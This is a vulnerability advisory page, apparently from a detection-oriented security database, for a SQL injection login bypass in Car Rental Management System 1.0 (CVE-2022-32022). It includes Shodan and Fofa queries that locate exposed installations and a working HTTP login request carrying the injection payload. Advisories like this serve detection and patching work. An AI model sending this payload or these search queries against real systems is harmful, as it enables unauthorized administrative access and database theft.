🔙 목록으로 돌아가기

CVE-2022-32022: Car Rental Management System 1.0 - SQL Injection

TitleCar Rental Management System 1.0 - SQL Injection
Authorarafatansari
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score7.2
EPSS Score0.11785
CVE IDCVE-2022-32022
CWE IDCWE-89
Shodan Queryhttp.html:"Car Rental Management System"http.html:"car rental management system"
Fofa Querybody="car rental management system"
Tags cve cve2022 carrental cms sqli login-bypass car_rental_management_system_project vuln

🔍 Vulnerability Description

Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

POST /admin/ajax.php?action=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin'+or+'1'%3D'1'%23&password=admin
GET /admin/index.php?page=home HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-32022.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-32022.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A